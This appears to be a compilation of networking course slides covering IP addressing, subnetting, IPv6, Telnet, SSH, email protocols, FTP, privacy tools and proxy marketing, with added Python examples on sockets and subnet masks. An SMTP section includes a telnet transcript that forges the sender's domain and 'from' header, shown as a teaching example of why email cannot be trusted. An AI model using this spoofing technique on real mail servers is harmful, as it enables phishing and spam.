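def loopback_roundtrip(payload):
    """Run server and client in one process over 127.0.0.1.

    Returns (reply, peer_ip). Binding to 127.0.0.1 rather than 0.0.0.0 is what
    guarantees the listener is unreachable from the network during the test.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))      # port 0: the kernel picks a free port
    listener.listen(1)
    port = listener.getsockname()[1]
    result = {}
    server = threading.Thread(target=_serve_one, args=(listener, result))
    server.start()
    with socket.create_connection(("127.0.0.1", port), timeout=5) as client:
        client.sendall(payload)
        reply = client.recv(4096)
    server.join(timeout=5)
    listener.close()
    return reply, result["peer_ip"]


def limited_broadcast_socket():
    """UDP socket allowed to send to 255.255.255.255.

    Without SO_BROADCAST the kernel refuses such a send (EACCES on Linux).
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    return sock


def broadcast_enabled(sock):
    return sock.getsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST) == 1


if __name__ == "__main__":
    reply, peer = loopback_roundtrip(b"hello over loopback")
    print(reply, "received from", peer)
```

The peer address the server records is 127.0.0.1 and no interface other than lo ever sees the segments; if the same code bound to 0.0.0.0 the "test" server would be reachable by anyone on the LAN, a common way debugging listeners end up exposed.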

Use of different Class addresses


• In some environments it may be best to use addresses all from one class.
• For example, a corporate internet that consists of a large number of departmental LANs may need to use Class C addresses exclusively.
• However, the format of the addresses allows all three classes to be mixed on the same internet. Example: the Internet.
• A mixture of classes is preferable for an internet consisting of a few large networks, many small networks, plus some medium-sized networks.
212

Address Depletion
• The TCP/IP designers did not anticipate the enormous scale of today's network.
• When TCP/IP was being designed, networking was limited to large organizations that could afford substantial computer systems.
• The idea of a powerful UNIX system on every desktop, or an X-terminal, or a PC with X-Ware (PC software to emulate an X-terminal) did not exist.
• At that time, a 32-bit address seemed so large that it was divided into classes to reduce the processing load on routers.
213
Address Depletion
• For example, assigning a large network a single class B address, instead of a few class C addresses, reduces the load on the router, because the router only needs to keep one route for that entire organization.
• However, the organization that was given the class B address probably does not have 64,000 computers, so most of the host addresses available to the organization will never be assigned.
• The classful design, which favours routers over growth, came under critical strain from the rapid growth of the Internet; at the rate of growth at the time, all class B addresses would soon have been exhausted.
• To prevent this, blocks of class C addresses were assigned to organizations instead, but each class C address requires its own entry in the routing table.
• This solution caused the routing table to grow so rapidly that routers risked being overwhelmed.
214
Address Depletion
These problems were taken up by the ROAD (Routing and Addressing) working group of the Internet Engineering Task Force (IETF). They looked for a scheme that:
• would relieve the problem of address depletion, perhaps by moving to a larger address (a 160-bit address was one proposal);
• uses classless addresses;
• can be implemented in new routers without requiring changes to the end systems (the hosts).
When these notes were written it was not known which technique the IETF would adopt; the expectation was that whatever happened, the changes would have no near-term effect on hosts, and IP addressing would stay the same for some time. (In the event the IETF adopted classless inter-domain routing, CIDR, for IPv4 in 1993, and the larger 128-bit address came with IPv6, discussed later in these slides.)
215

Why subnetting?
• Preservation of address space
• Control network traffic, avoid collisions
• Reduce the routing complexity
• Improve network performance
• Security
216

Subnetting
Subnetting is a method for getting the most out of the limited 32-bit IP addressing space. With any address class, subnetting provides a means of allocating a part of the host address space to network addresses, which lets you have more networks. The part of the host address space allocated to new network addresses is known as the subnet number.

The InterNIC assigned the University of Windsor one class B network address, 137.207.0.0, with network number part 137.207. The host number part is left to be assigned by local management (Computing Services).
217

Subnetting
218
Subnetting
• In a class B IP address, the 2 right-hand bytes assigned to the host number can be subdivided into up to 254 subnetworks of 254 hosts each (using an 8-bit subnet field; the all-zeros and all-ones subnet numbers were excluded under the original rules).
• Which bits of the host address bytes are applied to the subnet address and which to the host address is determined by a subnet mask, or netmask (/etc/netmasks on older UNIX systems).
• The netmask is applied to an IP address using the bitwise logical AND operator.
• If the netmask 255.255.255.0 (or FF.FF.FF.00) is applied to the address 137.207.192.3 (or 89 CF C0 03), the result is the network number 137.207.192.0,
i.e.: 137.207.192.3 & 255.255.255.0
= 137.207.192.0
or, 89 CF C0 03 & FF FF FF 00
= 89 CF C0 00.
Subnetting 219

In binary form, the operation is:

10001001 11001111 11000000 00000011 (IP address)
AND
11111111 11111111 11111111 00000000 (netmask)
------------------------------------------------------------------------
10001001 11001111 11000000 00000000 (masked number)

The router (or server) now looks up the subnet number 137.207.192.0 instead of the whole class B network number 137.207.0.0, finds the host (workstation) in its table, and adds the corresponding machine number to obtain 137.207.192.3. To allow more than 254 hosts per subnet, a different mask could be used, giving fewer subnetworks with more hosts each.
220

Default subnet masks:

Class A - 255.0.0.0 - 11111111.00000000.00000000.00000000
Class B - 255.255.0.0 - 11111111.11111111.00000000.00000000
Class C - 255.255.255.0 - 11111111.11111111.11111111.00000000
221
Subnetting
222
IP Subnetting
• Subnetting is a technique used to allow a single IP
network address to span multiple physical networks.
IP hosts should support subnetting.
• Subnetting is done by using some of the bits of the
host-id part of the IP address as a physical network
identifier.
• The subnet mask is used to determine the bits of the
network identifier.
• All hosts on the same network should have the same
subnet mask.
223
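A worked example of the netmask operation and the subnet arithmetic from the slides above (added here; it is not part of the original slides). It reproduces the 137.207.192.3 AND 255.255.255.0 calculation, computes how many subnets and hosts a mask carves out of the University's class B block, and shows the decision a host actually makes with the result: whether a destination is on the same subnet (deliver directly) or must be handed to the router. A check for non-contiguous masks is included because a malformed mask passes silently through the AND and simply misroutes traffic. Addresses other than 137.207.0.0 are constructed samples.

```python
# Added example: applying a subnet mask with bitwise AND and deriving the
# subnet plan. Not part of the original slides; 137.207.x.x is the slides'
# class B block, the other addresses are constructed samples.
import socket
import struct


def ip_to_int(text):
    """Dotted decimal -> 32-bit int (inet_aton validates the syntax)."""
    return struct.unpack("!I", socket.inet_aton(text))[0]


def int_to_ip(value):
    return socket.inet_ntoa(struct.pack("!I", value))


def prefix_from_mask(mask_text):
    """Length of a contiguous netmask; rejects masks like 255.0.255.0."""
    inverted = ~ip_to_int(mask_text) & 0xFFFFFFFF
    # A valid mask inverts to 0...01...1, i.e. one less than a power of two.
    if inverted & (inverted + 1):
        raise ValueError(f"non-contiguous netmask {mask_text}")
    return 32 - inverted.bit_length()


def network_number(ip_text, mask_text):
    """The AND the slides show: 137.207.192.3 & 255.255.255.0 = 137.207.192.0."""
    return int_to_ip(ip_to_int(ip_text) & ip_to_int(mask_text))


def broadcast_address(ip_text, mask_text):
    """Directed broadcast: the network number with every host bit set to one."""
    mask = ip_to_int(mask_text)
    return int_to_ip((ip_to_int(ip_text) & mask) | (~mask & 0xFFFFFFFF))


def same_subnet(a_text, b_text, mask_text):
    """The sender's delivery decision: direct delivery if the masked numbers
    match, otherwise hand the packet to the default router."""
    return network_number(a_text, mask_text) == network_number(b_text, mask_text)


def subnet_plan(classful_prefix, mask_text):
    """How many subnets and hosts a mask carves out of a classful network."""
    prefix = prefix_from_mask(mask_text)
    subnet_bits = prefix - classful_prefix
    host_bits = 32 - prefix
    if subnet_bits < 0 or host_bits < 2:
        raise ValueError("mask must extend the classful prefix and leave >= 2 host bits")
    subnets = 1 << subnet_bits
    return {
        "subnet_bits": subnet_bits,
        "subnets": subnets,
        # Original RFC 950 rule: all-zeros and all-ones subnet numbers unused.
        "classic_usable_subnets": max(subnets - 2, 0) if subnet_bits else 1,
        "host_bits": host_bits,
        "hosts_per_subnet": (1 << host_bits) - 2,
    }


def show_and(ip_text, mask_text):
    """Render the binary AND in the layout the slides use."""
    def fmt(v):
        return " ".join(f"{(v >> s) & 0xFF:08b}" for s in (24, 16, 8, 0))
    ip, mask = ip_to_int(ip_text), ip_to_int(mask_text)
    return "\n".join([f"{fmt(ip)} (IP address)", "AND", f"{fmt(mask)} (netmask)",
                      "-" * 35, f"{fmt(ip & mask)} (masked number)"])


if __name__ == "__main__":
    print(show_and("137.207.192.3", "255.255.255.0"))
    print(subnet_plan(16, "255.255.255.0"))
    print(same_subnet("137.207.192.3", "137.207.193.1", "255.255.255.0"))
```

With the /16 block and a 255.255.255.0 mask the plan gives 256 subnets (254 under the original rule) of 254 hosts; with 255.255.240.0 it gives 16 subnets of 4094 hosts, the trade-off the slide's last sentence describes. The same_subnet call returning False for 137.207.193.1 is exactly why a host with the wrong mask configured will ARP for addresses it should have sent to its router, and vice versa.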
IP - The Next Generation (IPng - IPv6)
• The growing number of INTERNET hosts causes a shortage of IP
addresses and will eventually consume the entire address space.
• The theoretical address space (2^32 nodes) is largely wasted
due to assignment inefficiencies.
• Dividing the address space into classes (A, B and C) made its own
contribution to the inefficiency of address assignment.
• Changing the IP addressing scheme is a matter concerning all
INTERNET users and is an opportunity for adding functionality to IP.
• The new version of IP is often referred to as IPng:
"INTERNET Protocol: The Next Generation".
• Most INTERNET users agreed IPng should have a hierarchical
address structure. This new address structure should be large
enough to meet the needs of the INTERNET community for a
very long time.
IP - The Next Generation (IPng - IPv6)
• There were several proposals for IPng. The most likely to
become a standard were: "Common Architecture for the
INTERNET" (CATNIP), "Simple INTERNET Protocol Plus" (SIPP),
and "TCP/UDP Over CLNP-Addressed Networks" (TUBA).
• The guidelines for choosing one proposal over the others were:
– Current address assignment policies should not be changed.
– There is no need to reclaim assigned network numbers.
– There is no need to renumber most of the INTERNET.
• Eventually the "Simple INTERNET Protocol Plus (SIPP) Spec.
(128 bit ver)" was adopted as the basis for IPng.
• IPng was assigned the name IPv6.

IPng - IPv6 addressing

• IPng offers a larger address space for the INTERNET users.
• The IP address size will be increased from 32 bits to 128 bits.
• This change will allow a much bigger number of nodes
than is available today, with more levels of addressing
hierarchy, and simpler auto-configuration of addresses.
• An address size of 128 bits is large enough to support a
huge number of nodes even with the inefficiency of
address assignment.

IPv6 addressing: IP header

• The IP header will be changed.
• Some fields will be removed in order to keep the overhead
low (in spite of increasing the number of address bits).
• Thus, even though IPv6 addresses are four times longer than
IPv4 addresses, the IPv6 header is only twice the size of the
IPv4 header.
• A new function in IPv6 is source routing, which together
with Cluster addresses will allow nodes to control their
routing in a more precise way.
Upgrading IPv4 to IPng - IPv6
• The transition from IPv4 to IPv6 will be simple and
flexible.
• The upgrade will be Incremental: existing IPv4 hosts
and routers may be upgraded to IPv6 and new hosts
and routers can be installed independently.
• When existing IPv4 hosts or routers are upgraded, they
can continue to use their current address.
• The start-up costs are low and little work is needed to
upgrade existing systems to IPv6.

How the Internet Works

• TCP/IP
• Routing Traffic Across the Internet
• Addressing Schemes
• Domains and Subdomains

How the Internet Works - TCP/IP

• Every computer and network on the Internet uses the same protocols
(rules and procedures) to control timing and data format.
• The protocol used by the Internet is the Transmission Control
Protocol/Internet Protocol, or TCP/IP.
• No matter what type of computer system you connect to the Internet, if
it uses TCP/IP, it can exchange data with any other type of computer.
How the Internet Works -
Routing Traffic Across the Internet
• Most computers don't connect directly to the Internet. Instead, they
connect to a smaller network that is connected to the Internet backbone.
• The Internet includes thousands of host computers (servers), which
provide data and services as requested by client systems.
• When you use the Internet, your PC (a client) requests data from a host
system. The request and data are broken into packets and travel across
multiple networks before being reassembled at their destination.

The Operation of the Internet

• Packets of information flow between machines governed by common rules
(protocols):
– Internet Protocol (IP)
– Transmission Control Protocol (TCP)
• The Internet is a packet-switching network
– Messages are decomposed into packets, each containing part of the
message, plus information on the sending and receiving machines
and how the packet relates to the other packets
– Packets travel independently and possibly on different routes
through the Internet
– Packets are reassembled into the message at the receiving
machine.

How the Internet Works - Addressing Schemes

• In order to communicate across the Internet, a computer must have a
unique address.
• Every computer on the Internet has a unique numeric identifier, called
an Internet Protocol (IP) address.
• Each IP address has four parts – each part a number between 0 and 255.
An IP address might look like this: 205.46.117.104.

Where to Begin? Internet Addresses

• Because the Internet is a global network of computers, each
computer connected to the Internet must have a unique
address. Internet addresses are in the
form nnn.nnn.nnn.nnn where nnn must be a number from 0 -
255. This address is known as an IP address. (IP stands for
Internet Protocol; more on this later.)
• The picture below illustrates two computers connected to the
Internet; your computer with IP address 1.2.3.4 and another
computer with IP address 5.6.7.8. The Internet is represented
as an abstract object in-between.

• If you connect to the Internet through an Internet Service
Provider (ISP), you are usually assigned a temporary IP
address for the duration of your dial-in session. If you
connect to the Internet from a local area network (LAN)
your computer might have a permanent IP address or it
might obtain a temporary one from a DHCP (Dynamic
Host Configuration Protocol) server. In any case, if you are
connected to the Internet, your computer has a unique IP
address.

Check It Out - The Ping Program

If you're using Microsoft Windows or a flavor of Unix and have a
connection to the Internet, there is a handy program to see if a
computer on the Internet is alive. It's called ping, probably after
the sound made by older submarine sonar systems. If you are
using Windows, start a command prompt window. If you're using
a flavor of Unix, get to a command prompt. Type ping
www.yahoo.com. The ping program will send a 'ping' (actually an
ICMP (Internet Control Message Protocol) echo request message)
to the named computer. The pinged computer will respond with a
reply. The ping program will count the time expired until the reply
comes back (if it does). Also, if you enter a domain name (i.e.
www.yahoo.com) instead of an IP address, ping will resolve the
domain name and display the computer's IP address. More on
domain names and address resolution later.
Protocol Stacks and Packets
So your computer is connected to the Internet and has a unique
address. How does it 'talk' to other computers connected to the
Internet? An example should serve here: Let's say your IP address is
1.2.3.4 and you want to send a message to the computer 5.6.7.8. The
message you want to send is "Hello computer 5.6.7.8!". Obviously,
the message must be transmitted over whatever kind of wire
connects your computer to the Internet. Let's say you've dialed into
your ISP from home and the message must be transmitted over the
phone line. Therefore the message must be translated from
alphabetic text into electronic signals, transmitted over the Internet,
then translated back into alphabetic text. How is this accomplished?
Through the use of a protocol stack. Every computer needs one to
communicate on the Internet and it is usually built into the
computer's operating system (i.e. Windows, Unix, etc.). The protocol
stack used on the Internet is referred to as the TCP/IP protocol stack
because of the two major communication protocols used. The TCP/IP
stack looks like this:
Protocol Layer - Comments

Application Protocols Layer - Protocols specific to applications such as WWW, e-mail, FTP, etc.
Transmission Control Protocol Layer - TCP directs packets to a specific application on a computer using a port number.
Internet Protocol Layer - IP directs packets to a specific computer using an IP address.
Hardware Layer - Converts binary packet data to network signals and back. (E.g. ethernet network card, modem for phone lines, etc.)

How the Internet Works - Domains and Subdomains

• In addition to an IP address, most Internet hosts or servers have a Domain
Name System (DNS) address, which uses words.
• A domain name identifies the type of institution that owns the computer.
An Internet server owned by IBM might have the domain name ibm.com.
• Some enterprises have multiple servers, and identify them with
subdomains, such as products.ibm.com.

Major Features of the Internet

• The World Wide Web
• E-Mail
• News
• Telnet
• File Transfer Protocol (FTP)
• Internet Relay Chat (IRC)

Major Features of the Internet - The World Wide Web

• The World Wide Web is a part of the Internet, which supports hypertext
documents, allowing users to view and navigate different types of data.
• A Web page is a document encoded with hypertext markup language (HTML)
tags.
• HTML allows designers to link content together via hyperlinks.
• Every Web page has an address, a Uniform Resource Locator (URL).

[Figure: the parts of a URL, with these callouts]
• This address is for an Internet server that uses the hypertext transfer protocol.
• This site is on the part of the Internet known as the World Wide Web.
• This site belongs to a company named Glencoe.
• To find the specific Web pages that accompany this book, your browser follows
the URL's path to a folder named "norton," then to a subfolder named "online."

Major Features of the Internet - E-Mail

• Electronic mail (e-mail) is the most popular reason people use the
Internet.
• To create, send, and receive e-mail messages, you need an e-mail
program and an account on an Internet mail server with a domain name.
• To use e-mail, a user must have an e-mail address, which you create by
adding your user name to the e-mail server's domain name, as in
[email protected].
Example of Telnet (Character mode)

[Figure: a Telnet session in character mode]
Image from Dr. Wang's course at:
http://www.cse.scu.edu/~mwang2/tcpip/
Some Common Features of Telnet

• Telnet runs on a single TCP connection to port 23
• The Telnet connection is unencrypted
• So it is easy for an eavesdropper!
• In most cases, telnet is a remote terminal. Each character is transmitted in a
separate packet
• The same is true for the SSH login stage
• A feature that could be exploited for a "timing attack".
Telnet Commands

• telnet longwood.eecs.ucf.edu (eecs email server)
• Sets up a remote shell to the server
• It will be denied since most Unix servers nowadays do not support telnet
• telnet longwood.eecs.ucf.edu 25
• Sets up a TCP connection to port 25 (email service)
• We will show this usage in the Email lecture
SSH – Secure Shell

• Replacement for the old insecure Telnet program
• Both ends authenticate with each other
• Relies on public key cryptography
• Will introduce PK in the last chapter
• All communication messages are encrypted
• SSH is also used as a secure tunneling channel for other applications
• File transfer
• Port forwarding (such as X window)
• Virtual private network (VPN)
SSH – Secure Shell

• Under a Unix machine:
• The hidden directory .ssh holds all configuration files
• "known_hosts" saves the public keys of all previously connected SSH servers
• An attacker cannot impersonate a known SSH server anymore
• You have to trust what you get on the first connection attempt
SSH Programs and Usages

• Many open source ssh client programs
• http://en.wikipedia.org/wiki/Comparison_of_SSH_clients
• PuTTY
• SSH uses a TCP connection on port 22
• Login methods:
• Password
• Private key kept on the client, public key stored on the server (come to this in a
later security chapter)
26-2 ELECTRONIC MAIL

One of the most popular Internet services is electronic
mail (e-mail). The designers of the Internet probably
never imagined the popularity of this application
program. Its architecture consists of several components
that we discuss in this chapter.

Topics discussed in this section:
Architecture
User Agent
Message Transfer Agent: SMTP
Message Access Agent: POP and IMAP
Web-Based Mail

Figure 26.6 First scenario in electronic mail

MUA: mail user agent

Note
When the sender and the receiver of an e-mail are on the same system,
we need only two user agents.

MUA: Outlook Express, Netscape Messenger, Mozilla Thunderbird, Eudora,
Foxmail, ...

Note
When the sender and the receiver of an e-mail are on different systems, Wikipedia
shows a good example of email operation (next page)
Typical Email Operation (from Wikipedia)

[Figure: typical email operation, with these callouts]
• Could also be IMAP4
• Email server's DNS
• DNS query for MX RR (name and IP)
Client's Email Operation Mode

• Remote terminal using SSH to the email server directly
• Then uses an MUA on the email server
• Such as Pine, Elm on Unix machines
• Use an MUA on the client's own computer
• The MUA formats the email and sends it to the sender's email server
• Web-based email systems using a web browser
• Gmail, Yahoo mail, Hotmail, ...
• Spammer: a simple program sending email to email servers directly via the SMTP protocol

Figure 26.11 Services of user agent

Note
Some examples of command-driven user agents are mail, pine,
and elm (under Unix).

Note
Some examples of GUI-based user agents are Eudora, Outlook, and Netscape.

Figure 26.12 Format of an e-mail

Figure 26.13 E-mail address

• The sender uses a DNS query for the MX record of the domain name in order to find the
name and IP of the target email server

Figure 26.14 MIME (Multipurpose Internet Mail Extensions)

NVT: network virtual terminal (telnet)
SMTP protocol: only this data

MIME

• The user agent makes the translation between non-ASCII data and the ASCII email
message
• If you check the source file of an email that has an attachment, you will find the MIME
usage
• This is the main reason why your email with an attachment becomes bigger

Figure 26.15 MIME header

Table 26.5 Data types and subtypes in MIME

Table 26.6 Content-transfer-encoding

Figure 26.16 SMTP (Simple Mail Transfer Protocol) range
POP3 or IMAP4

Figure 26.17 Commands and responses

Figure 26.18 Command format

Table 26.7 Commands

Table 26.8 Responses

Table 26.8 Responses (continued)

Example 26.3

Let us see how we can directly use SMTP to send an
e-mail and simulate the commands and responses we
described in this section. We use TELNET to log into port
25 (the service port for SMTP). We then use the commands
directly to send an e-mail.

Through this process, you can see why you cannot trust the
"sender" or any other part of a received email, and why email spam
is so easy to generate.
Sample email sending using telnet
“telnet longwood.cs.ucf.edu 25”
C: HELO fake.domain
S: 250 Hello crepes.fr, pleased to meet you
C: MAIL FROM: <[email protected]>
S: 250 [email protected]... Sender ok
C: RCPT TO: <[email protected]>
S: 250 [email protected] ... Recipient ok
C: DATA
S: 354 Enter mail, end with "." on a line by itself
C: from: “fake man” <[email protected]>
C: to: “dr. who” <who@who>
C: subject: who am I?
C: Do you like ketchup?
C: How about pickles?
C: .
S: 250 Message accepted for delivery
C: QUIT
S: 221 longwood.cs.ucf.edu closing connection

Try SMTP interaction for yourself:

• telnet servername 25
• see the 220 reply from the server
• enter HELO, MAIL FROM, RCPT TO, DATA, QUIT commands
– "mail from": the domain may need to exist
– "rcpt to": the user needs to exist
– A mail server may or may not support "relay"
This lets you send email without using an email user agent

What is "email open relay"?

• An open mail relay is an SMTP server configured in such a
way that it allows anyone on the Internet to send e-mail
through it, not just mail destined to or originating from known
users.
• This used to be the default configuration in many mail servers
and it was the way the Internet was initially set up
• But open mail relays have become unpopular due to their
exploitation by spammers. Many relays were closed, or were
placed on blacklists by other servers.

From Wikipedia: http://en.wikipedia.org/wiki/Open_mail_relay

Email Server in Our Department

• EECS email server: longwood.eecs.ucf.edu
• Before this year, the CS email server supported
relay from inside campus
– You could use telnet to send manual email from any
computer inside the campus network
– Now it is more restrictive, and only supports relay from
some fixed computers (such as the eustis Unix
machine)
– Eustis machine: eustis.eecs.ucf.edu

NOTES: Ethical Issue on Manually Sending Email

• Do not try to use telnet on the department email server except for the homework!
• Do not try to use it to spam your friends without upfront notice!

Figure 26.19 POP3 (Post Office Protocol) and IMAP4 (Internet Mail Access
Protocol)

Figure 26.20 The exchange of commands and responses in POP3
POP3 protocol (tcp: 110)

Authorization phase, client commands:
– user: declare username
– pass: password
Server responses:
– +OK
– -ERR
Transaction phase, client commands:
• list: list message numbers
• retr: retrieve message by number
• dele: delete
• quit

Telnet example:
S: +OK POP3 server ready
C: user bob
S: +OK
C: pass hungry
S: +OK user successfully logged on
C: list
S: 1 498          (message number, length in bytes)
S: 2 912
S: .
C: retr 1
S: <message 1 contents>
S: .
C: dele 1
C: retr 2
S: <message 2 contents>
S: .
C: dele 2
C: quit
S: +OK POP3 server signing off

POP3 and IMAP4

• IMAP4 provides more functionality
• Both POP3 and IMAP4 have corresponding encrypted protocols

Web-based Email

• The email client is a web browser, used for all interactions
• A user can access his/her email anywhere, via any computer that has Internet
access
• The email provider may offer more functions
• Gmail has very good search capability
• Gmail has the message grouping function
• Many provide bundled services with their other products
• Voice/video, photo sharing, ...
26-3 FILE TRANSFER

Transferring files from one computer to another is one
of the most common tasks expected from a networking
or internetworking environment. As a matter of fact, the
greatest volume of data exchange in the Internet today
is due to file transfer.

Topics discussed in this section:
File Transfer Protocol (FTP)
Anonymous FTP

Note
FTP uses the services of TCP. It needs two TCP connections.
The well-known port 21 is used for the control connection and the well-known port
20 for the data connection.

Figure 26.21 FTP

Figure 26.22 Using the control connection

Figure 26.23 Using the data connection

Example 26.4 (continued)

Example 26.5
We show an example of anonymous FTP. We assume that
some public data are available at internic.net.

Example 26.5 (continued)

Dying of FTP

• People seldom use FTP nowadays
• It has been replaced in two ways:
• Web-based file upload/download
• The browser shows the directory contents if the directory does not have a default
html file
• SSH-based file transfer

Definitions: Ideals Not Realities!

Privacy vs Security vs Anonymity

• Privacy (P): "I control my information".
• Anonymity (A): "A third party cannot
associate my information with me."
• Security (S): "My information is safe
from interference (harm)".
• Not mutually exclusive
• Can be combined (protection in depth)
• Single point of failure: the human

Hypothetical Example
• A video file (VF) resides in your computer.
• Assume the computer is always offline, is immune to
digital forensics, and can only be accessed by you.
– VF: S, P, A
• You allow others to use your computer.
– VF: !S, !P, !A
• You encrypt the file (homebrew)
– VF: S, !P, !A
• You implement user control, others cannot access the
file
– VF: S, P, !A
• You hide the file from other users
– VF: S, P, A

The Problem
• Networks greatly complicate security, privacy, and
anonymity
• A known (not anonymous) file breaches privacy
and risks security
• A non-private file breaches anonymity and risks
security
• An insecure file risks privacy and anonymity
• Uploading that video file from the previous
example to a website like YouTube throws
anonymity right out the window

Network (IP) Traffic

Transmission Control Protocol (TCP) vs User Datagram Protocol (UDP):
1. Examples: TCP - HTTP, FTP, SMTP; UDP - DNS, DHCP, VOIP
2. TCP is connection oriented; UDP is connection-less
3. TCP: reliability > speed; UDP: speed > reliability
4. TCP is heavyweight (requires a 3-way handshake); UDP is lightweight (no handshake)
5. Usage: TCP - small data; UDP - big data
6. Target practice analogy: TCP - stop and pop; UDP - spray and pray

Web Browsers and the Internet

1. Your web browser is a client that allows you to access the
world's largest server, the internet.
2. The internet uses a service called the World Wide Web to
make it easy for clients (browsers) to view its content.
– URLs, IP addresses, search engines (web crawlers), etc.
3. Web browsers display information by interpreting HTML
references accessed via the internet. The HTML acts as
pointers to the information you actually want to access.
4. The HTML's coding tells the browser how to interpret the
information (i.e. file format)
5. Browsers need to be configured with plugins to view
certain kinds of information.
– Ex: Adobe Flash, Active X, Java, JavaScript, etc.
6. Previous information is stored on your browser for future
easy access (cookies, history, etc.).

Private Browsing
• Unlike normal browsing, no information is stored about
you
• Private Sessions are “sandboxed” from normal sessions
• Plugins may or may not be private
• Still vulnerable to:
– Search engines
– Websites that collect/share info about you (read: most
websites)
– Malware
– Internet Service Provider (ISP) surveillance
– Physical surveillance

Private Browsing++
• NoScript: Control exactly what scripts (plugins)
run on your computer
• AdBlock Plus: Keep ads and adware from
executing on your computer
• Abine's Blur: Anti-Trackers, Autogenerated Proxy
Email Addresses, Passwords, and Credit Card
Numbers
• ShodanHQ and ScamAdvisor.com: Check where a
website is and whether it is legitimate
• CCleaner and others: Customizable local data
management

Proxies vs Virtual Private Networks

Proxies (Tor) vs VPN

Onion Routing and VPN

Onion Routing:
1. Free!
2. Main Architecture: P2P
3. Do It yourself
4. Priority: Privacy and Anonymity

VPN:
1. $$$
2. Main Architecture: Client-Server
3. Generally All-In-One (commercial)
4. Priority: Security and Privacy
5. Protocol: TCP and UDP

Mobile Anonymity

• Anonymity does not automatically transfer to mobile devices!
• You have to manually configure everything again...
• Browsers: DuckDuckGo (or configure other browsers)
• Proxy: Orbot
• VPN: OpenVPN
• Root/Jailbreak for full control!
[Diagram: client proxy between clients and the Internet, with these functions]
• Byte caching
• Logging
• Protocol detection
• Authentication
• Bandwidth (BW) management
• Policy
• Caching
• Antivirus
• Protocol optimization
• Compression
• URL filtering

[Diagram: application proxy between clients and the Internet, handling these protocols]
• Streaming
• HTTP & HTTPS
• FTP
• AOL-IM, Yahoo-IM, MSN-IM
• MAPI
• CIFS
• P2P
• Telnet/Shell
• DNS
• TCP-Tunnel
• SOCKS
• File types such as .mp3, .xxx
How We Secure the Web

[Diagram: an internal network with an intranet web server, and a public web server on the public Internet]
• AAA: User logs onto network and is authenticated via NTLM,
AD (Single-Sign-on), LDAP, Radius, Forms, local password.
Authentication

[Diagram: the proxy sits between clients and the Internet and authenticates against these back ends]
• NT, W2000 or W2003 domain controller (AD directory)
• RADIUS server (directory)
• Netegrity SiteMinder (directory)
• Policy substitution
• LDAP client (directory)
• On-box certificate database (X509/CA list)
• Oblix (directory)
How We Secure the Web (continued)

• Policy Processing Engine: All user web application requests
are subjected to granular security policy
How We Secure the Web (continued)

• Content Filtering: Requests for content are controlled using
content filtering based on granular policy

Content Filtering

• Organizations need to control what users are doing when accessing the
internet to protect from legal liability and productivity risks
• Blue Coat and our partners enable enterprise-class content filtering
– Powerful granular user control using Blue Coat's Policy Processing Engine
• By user, group, destination IP and/or URL, time of day, site, category, lots more
– Multiple logging and reporting options
– Integrates with all authentication (LDAP, RADIUS, NTLM, AD, 2-factor, etc)
– Coaching, warnings, etc.
– High performance with integrated caching
– Drop-in appliance, easy to deploy and manage
– De-facto industry content filtering platform
Content filtering databases

[Diagram: the proxy between clients and the Internet consults these content filtering databases]
• InterSafe
• Optenet
• IWF
• WebWasher
• Digital Arts
• Smartfilter
• SurfControl
• Proventia
• Websense
• Your own lists and exceptions
• BlueCoat Webfilter and DRTR
How We Secure the Web (continued)

• Bandwidth management: Compression, Bandwidth
management and Streaming media Caching and Splitting.

HTTP Compression

ProxySG can support a mixed mode of HTTP compression operation.
The Original Content Server (OCS) or the core ProxySG can send either compressed or
uncompressed content to an edge or core ProxySG using the GZIP or Deflate algorithms.

[Diagram: compressed and uncompressed paths between the Internet, a core ProxySG at the HQ office, and edge ProxySG appliances at a remote office and in the enterprise]

Bandwidth Management (BWM)

OBJECTIVE
Classify, control and limit the amount of bandwidth used
by a class of network traffic

BENEFITS
Protect performance of mission critical applications
• SAP, ERP apps
Prevent bandwidth greedy applications from impacting other applications
• P2P
Provision bandwidth for applications that require a per-session amount of
bandwidth
• Streaming
Balance necessary and important, bandwidth intensive, applications
• HTTP, IM
How We Secure the Web (continued)

• Web Virus scanning: Potentially harmful content entering the
network via HTTP, HTTPS and FTP is stripped or scanned
by ProxyAV.
Virus, Code & Script scanning

[Diagram: the proxy between clients and the Internet hands content to ProxyAV or other ICAP servers for scanning; engines shown: Sophos, McAfee, Kaspersky, Panda]

ProxyAV

ProxySG & ProxyAV
- Large Enterprise/Network Core
- Scan once, serve many (cache benefit)

[Diagram: ProxySG between the Internet and the internal network, with ProxyAV attached]
• Purpose-built appliances for speed
• "Scan once, serve many" to increase performance
• High-availability & load-balancing
• Purpose built operating systems
• Virus scans HTTP, FTP with caching benefit
• ProxySG load balances to ProxyAV
How We Secure the Web (continued)

• Spyware: Prevention is better than a cure.
BlueCoat Spyware Prevention Solution

[Diagram: ProxySG and ProxyAV between the Internet and the internal network]
• Stops spyware installations
– Detects drive-by installers
• Blocks spyware websites
– On-Proxy URL categorization
• Scans for spyware signatures
– High-performance Web AV
• Detects suspect systems
– Forwards to cleansing agent
How We Secure the Web (continued)

• IM Traffic Control: IM traffic is subjected to policies and
is logged

IM Control with Blue Coat ProxySG

• Granular IM policy control
– By enterprise, group or user level
– Control by IM feature (IM only, chat, attachments, video,
etc.), internal or external IM, time of day, etc.
– Control IM options include deny connection,
strip attachment, log chat (including attachment)
– Key word actions include send alert to IT or manager,
log, strip, send warning message to user
• Drop-in appliance for easy to deploy
and manage IM control
How We Secure the Web (continued)

• Caching: Acceptable, clean content is stored
in cache and delivered to the requestor.
Streaming acceleration

• Streaming
– Microsoft Streaming & Native RTSP
– Live Stream split, VOD Stream cache
– Rich Streaming features, Unicast-Multicast
– Scheduling live streaming from VOD
• Enhancements
– Store, Cache & distribute Video On Demand
– Schedule VOD content to be played as Live Content
– Convert between Multicast-Unicast
– Authenticate Streaming users to NTLM, LDAP, RADIUS + on-box
How We Secure the Web (continued)

• Reporting: All browser, streaming, IM & virus activity
can be reported using Bluecoat's highly configurable
reporter.

Reporter

The Internet
The Internet today consists of 350 million web servers.
A large amount of these contain information you don't want in your organisation.
A clever solution would be to use Content Filtering.
BlueCoat now introduces Generation 3 of content filtering, BlueCoat Webfilter.
[Figure: 350 Million web servers]
328

Generation 1
